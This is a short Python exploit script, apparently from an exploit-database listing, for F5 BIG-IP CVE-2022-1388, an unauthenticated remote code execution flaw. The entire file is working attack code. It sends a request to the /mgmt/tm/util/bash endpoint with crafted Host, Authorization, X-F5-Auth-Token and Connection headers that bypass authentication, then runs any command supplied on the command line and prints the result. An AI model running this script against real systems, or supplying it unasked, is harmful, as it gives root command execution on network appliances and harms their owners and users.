Exploit-F5-BigIP-CVE-2022-1388.py

#!/usr/bin/python3
# Exploit Title: F5-BigIP Remote Code Execution (RCE) (Unauthenticated)
# Date: 09.05.2022
# Exploit Author: Qusai Alhaddad (SecurityKiller)
# Version: V1.0
# Tested on: F5-BigIP V11,12,13,14,15,16

import argparse
import requests
import urllib3
urllib3.disable_warnings()

def exploit(target, command):
    url = f'https://{target}/mgmt/tm/util/bash'
    headers = {
        'Host': '127.0.0.1',
        'Authorization': 'Basic YWRtaW46aG9yaXpvbjM=',
        'X-F5-Auth-Token': 'asdf',
        'Connection': 'X-F5-Auth-Token',
        'Content-Type': 'application/json'

    }
    j = {"command":"run","utilCmdArgs":"-c '{0}'".format(command)}
    r = requests.post(url, headers=headers, json=j, verify=False)
    print(r.json()['commandResult'].strip())

if __name__ == "__main__":
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', help='The IP address of the target', required=True)
    parser.add_argument('-c', '--command', help='The command to execute')
    args = parser.parse_args()

    exploit(args.target, args.command)